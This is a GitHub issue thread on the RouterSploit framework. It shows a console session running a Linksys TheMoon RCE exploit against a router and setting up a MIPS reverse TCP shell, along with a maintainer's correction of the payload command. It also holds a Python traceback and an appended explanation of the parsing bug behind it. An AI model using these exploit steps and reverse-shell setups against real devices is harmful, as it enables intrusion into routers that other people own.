threat9 / routersploit

Exploitation Framework for Embedded Devices

New to routersploit, what to do after run of exploit in cmd? #790

Closed windowshopr closed 1 year ago

windowshopr commented 2 years ago

! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !

Steps to Reproduce (for bugs)

  1. Not a bug, just need guidance

Your Environment

Current Behavior

```
[-] 172.16.1.254 Could not find default credentials
rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > show options

Target options:

   Name       Current settings     Description
   ssl        false                SSL enabled: true/false
   target                          Target IPv4 or IPv6 address
   port       80                   Target HTTP port

Module options:

   Name          Current settings     Description
   verbosity     true                 Verbosity enabled: true/false
   arch          mipsle               Target architecture: mipsbe, mipsle

rsf (Linksys E-Series TheMoon RCE) > set target 172.16.1.254
[+] target => 172.16.1.254
rsf (Linksys E-Series TheMoon RCE) > check
[+] Target is vulnerable
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module exploits/routers/linksys/eseries_themoon_rce...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload ' commands.

cmd > show payloads
[*] Available payloads:

   Payload               Name                   Description
   mipsle/bind_tcp       MIPSLE Bind TCP        Creates interactive tcp bind shell for MIPSLE architecture.
   mipsle/reverse_tcp    MIPSLE Reverse TCP     Creates interactive tcp reverse shell for MIPSLE architecture.

cmd > use mipsle/reverse_tcp
[*] Executing 'use mipsle/reverse_tcp' on the device...

cmd > set lhost 172.16.1.228
[*] Executing 'set lhost 172.16.1.228' on the device...

cmd > set lport 4321
[*] Executing 'set lport 4321' on the device...

cmd > run
[*] Executing 'run' on the device...

cmd > execute
[*] Executing 'execute' on the device...

cmd > use payloads/mipsle/reverse_tcp
[*] Executing 'use payloads/mipsle/reverse_tcp' on the device...

cmd >
```

## Expected Behavior
* As you can see at the end there, I was trying to figure out what to do, but essentially, I followed the steps to find the specific vulnerabilities of my router, and it found the `exploits/routers/linksys/eseries_themoon_rce` exploit, which is odd because my router is a 2wire, but maybe they're the same thing.
* Once I `use` the exploit, set my router as the `target`, it seems to open a `cmd` terminal environment to the device. Is this normal? It says that it's a blind command injection, which is fine, however I try to `use use mipsle/reverse_tcp` to attempt a reverse shell, but I think I'm doing this wrong.

Do I create the reverse shell OUTSIDE of this `cmd` first, and then somehow run an inject command to inject that payload into the router? And if so, how do I accomplish that? The tutorials on here show how to create the payload, but nothing from there.

lucyoa commented 1 year ago

It should be `set payload mipsle/reverse_tcp`

Codeiology commented 1 year ago

```
Traceback (most recent call last):
  File "interpreter.py", line 389, in command_run
    self.current_module.run()
  File "eseries_themoon_rce.py", line 54, in run
    shell(self, architecture="mipsle", method="wget", location="/tmp")
  File "shell.py", line 124, in shell
    data = payload.generate()
           ^^^^^^^^^^^^^^^^^^
  File "reverse_tcp.py", line 21, in generate
    reverse_ip = utils.convert_ip(self.lhost)
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "utils.py", line 69, in convert_ip
    res += bytes([int(i)])
                  ^^^^^^
ValueError: invalid literal for int() with base 10: ''

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "rsf.py", line 29, in <module>
    routersploit(sys.argv)
  File "rsf.py", line 25, in routersploit
    rsf.start()
  File "interpreter.py", line 125, in start
    command_handler(*args, **kwargs)
  File "utils.py", line 177, in wrapper
    return fn(self, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "interpreter.py", line 394, in command_run
    print_error(traceback.format_exc(sys.exc_info()))
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "traceback.py", line 187, in format_exc
    return "".join(format_exception(sys.exc_info(), limit=limit, chain=chain))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "traceback.py", line 139, in format_exception
    te = TracebackException(type(value), value, tb, limit=limit, compact=True)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "traceback.py", line 690, in __init__
    self.stack = StackSummary._extract_from_extended_frame_gen(
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "traceback.py", line 409, in _extract_from_extended_frame_gen
    if limit >= 0:
       ^^^^^^^^^^
TypeError: '>=' not supported between instances of 'tuple' and 'int'
```

Codeiology commented 1 year ago

Is what it says when I try to run the payload
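
The two exceptions in the traceback above can be reproduced and separated with the following added example, which is not RouterSploit's code and not from any commenter. The body of `convert_ip_unchecked` is an assumed reconstruction built around the one line the traceback shows, and `convert_ip_checked`, `report_broken` and `report_fixed` are hypothetical names; an empty `lhost` string is used as the constructed input.

```python
import ipaddress
import sys
import traceback


def convert_ip_unchecked(addr):
    # Assumed shape of the helper named in the traceback: split on dots, int() each part.
    res = b""
    for part in addr.split("."):
        res += bytes([int(part)])  # the line the traceback points at
    return res


def convert_ip_checked(addr):
    # Validate before converting so an unset option gives a clear message
    # instead of a bare int() parsing error.
    if not addr:
        raise ValueError("lhost is not set")
    try:
        return ipaddress.IPv4Address(addr).packed
    except ipaddress.AddressValueError as exc:
        raise ValueError(f"lhost is not a valid IPv4 address: {addr!r}") from exc


def report_broken(addr):
    # Mirrors the call in the second traceback: the exc_info tuple lands in
    # format_exc()'s `limit` parameter, so the error handler itself raises.
    try:
        convert_ip_unchecked(addr)
    except ValueError:
        try:
            return traceback.format_exc(sys.exc_info())
        except TypeError as exc:
            return f"handler failed: {type(exc).__name__}"


def report_fixed(addr):
    # format_exc() takes no exception argument; it reads the active exception itself.
    try:
        return convert_ip_checked(addr)
    except ValueError:
        return traceback.format_exc()


if __name__ == "__main__":
    print(report_broken(""))              # constructed input: empty lhost
    print(report_fixed(""))
    print(report_fixed("172.16.1.228"))
```

The second exception masks the first: the `TypeError` comes from the error-reporting call, while the underlying problem is the `ValueError` from an address string with an empty component.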